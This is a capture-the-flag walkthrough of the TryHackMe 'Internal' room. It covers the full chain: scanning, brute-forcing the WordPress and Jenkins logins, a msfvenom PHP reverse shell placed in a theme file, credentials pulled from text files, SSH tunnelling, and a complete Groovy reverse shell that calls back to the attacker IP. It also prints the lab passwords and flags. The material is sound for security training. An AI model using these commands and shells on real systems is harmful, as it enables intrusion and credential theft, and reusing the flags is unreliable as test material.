Internal

Attacking IP

10.17.34.202

Target IP

10.10.109.1

Recon

Nmap:

nmap -A -T3 -oN nmap.txt 10.10.109.1

Output:

# Nmap 7.94SVN scan initiated Sat Dec  9 17:07:57 2023 as: nmap -A -T3 -oN nmap.txt 10.10.109.1
Nmap scan report for 10.10.109.1
Host is up (0.30s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 6e:fa:ef:be:f6:5f:98:b9:59:7b:f7:8e:b9:c5:62:1e (RSA)
|   256 ed:64:ed:33:e5:c9:30:58:ba:23:04:0d:14:eb:30:e9 (ECDSA)
|_  256 b0:7f:7f:7b:52:62:62:2a:60:d4:3d:36:fa:89:ee:ff (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.29 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
 
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Dec  9 17:08:48 2023 -- 1 IP address (1 host up) scanned in 50.80 seconds

Gobuster:

gobuster dir -u http://10.10.109.1 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 100

Output:

/wordpress            (Status: 301) [Size: 314] [--> http://10.10.109.1/wordpress/]
/blog                 (Status: 301) [Size: 309] [--> http://10.10.109.1/blog/]
/javascript           (Status: 301) [Size: 315] [--> http://10.10.109.1/javascript/]
/phpmyadmin           (Status: 301) [Size: 315] [--> http://10.10.109.1/phpmyadmin/]

The /blog site is a bit ugly and the assignment tell us that:

Quote

Ensure that you modify your hosts file to reflect internal.thm

So we add an entry to /etc/hosts to reflect internal.thm with the target IP:

10.10.109.1 internal.thm

The site is more beautiful (?🤔).

Scan with WPScan:

wpscan -u http://10.10.109.1/blog -e vp,u

With:

-u: specify the URL
-e: enumerate
- vp: vulnerable plugins
- u: user IDs range (default: 1-10)

Output:

[+] WordPress version 5.4.2 identified (Insecure, released on 2020-06-10).
 
[i] User(s) Identified:
 
[+] admin
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

Brute Force

Try to brute force the password of admin by using ffuf¹:

ffuf -w /usr/share/wordlists/rockyou.txt -X POST -d "username=admin&password=FUZZ" -H "Content-Type: application/x-www-form-urlencoded" -u http://10.10.109.1/blog/wp-login.php -mc 200

We can also use wpscan:

wpscan --url http://10.10.109.1/blog --usernames admin --passwords /usr/share/wordlists/rockyou.txt --max-threads 100

Get the password very soon:

[!] Valid Combinations Found:
 | Username: admin, Password: my2boys

After login, we get the “Administration email verification” message and it reveals about the email: admin@internal.thm

In blog posts section, we see a private post (/blog/wp-admin/post.php?post=5) that has this content:

Quote

Don’t forget to reset Will’s credentials. william:arnold147

Seem like a credential🤦‍♀️. But it is a rabbit hole 😱 (according to the room’s author).

Reverse Shell

On WordPress, we can use “Theme Editor” feature and edit the first theme (“Twenty Seventee”) to create reverse shell².

Generate the script to create the reverse shell by using Metasploit Venom:

msfvenom -p php/meterpreter_reverse_tcp LHOST=tun0 LPORT=9999 -f raw > rev_shell.php

Edit the 404 template (404.php file) and replace its content with the above script content.

Start a meterpreter section:

msfconsole -x 'use php/meterpreter_reverse_tcp;set lhost tun0;set lport 9999;exploit'

Access this URL and we will get the reverse shell:

http://internal.thm/blog/wp-content/themes/twentyseventeen/404.php

Notice the theme name is twentyseventeen. This name can be found by click on “Customize” button of the theme.

Aubreanna

After receive the reverse shell, try to move to the folder /home/aubreanna but failed. This happens because the current user is www-data (use getuid command of meterpreter) and this user does not have the access.

Search for text file with meterpreter:

search -f *.txt

Find some interesting files:

/boot/grub/gfxblacklist.txt
/opt/wp-save.txt

Content of wp-save:

Bill,
 
Aubreanna needed these credentials for something later.  Let her know you have them and where they are.
 
aubreanna:bubb13guM!@#123

Use this to log in as user aubreanna through SSH:

ssh aubreanna@internal.thm

After log in, read user.txt and we have the flag:

Success

THM{int3rna1_fl4g_1}

Jenkins

Also find out a file named jenkins.txt that reveals Jenkins endpoint: http://172.17.0.2:8080/. This IP address, according to the room’s author, is a common address of a Docker container.

Use SSH tunneling³ to connect to the Jenkins service:

ssh -L 8080:172.17.0.2:8080 aubreanna@internal.thm

Now, the address 172.17.0.2:8080 will be forwarded to localhost:8080. Open browser and we get the login page of Jenkins.

Use Burp Suite (can’t use ffuf because we want to examine the response headers) to brute force the password by using Burp Suite Intruder with first 500 passwords from rockyou.txt wordlist.

Find a response contains this header:

Set-Cookie: JSESSIONID.bb2720fc=node019otbsjxrec5d1ko5l17b7tedl22478.node0

This response size is the smallest, so maybe its payload (spongebob) is the password. Try this password and it works.

Use “Script Console” feature in “Manage Jenkins” section to create a reverse shell in Groovy language. The script to create reverse shell:

String host="10.17.34.202";
int port=9999;
String cmd="/bin/bash";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();

Execute the script and we will receive a reverse shell (remember to start a nc server before).

Go to /opt folder again and find a file named note.txt with this content:

Aubreanna,
 
Will wanted these credentials secured behind the Jenkins container since we have several layers of defense here.  Use them if you need access to the root user account.
 
root:tr0ub13guM!@#123

And we found the root password 🤷‍♀️.

Success

THM{d0ck3r_d3str0y3r}

list
from [[Internal]]
sort file.ctime asc

Resources

Room: https://tryhackme.com/room/internal
Walkthrough: https://www.youtube.com/watch?v=2TmguIvR3Kw

refer to TryHackMe - Authentication Bypass ↩
refer to Introduction to Shells ↩
refer to Tunneling ↩

Quartz 🪬

Explorer

Internal

Recon

Brute Force

Reverse Shell

Aubreanna

Jenkins

Resources

Table of Contents

Backlinks

Quartz 🪬

Explorer

Internal

Recon

Brute Force

Reverse Shell

Aubreanna

Jenkins

Related

Resources

Footnotes

Table of Contents

Backlinks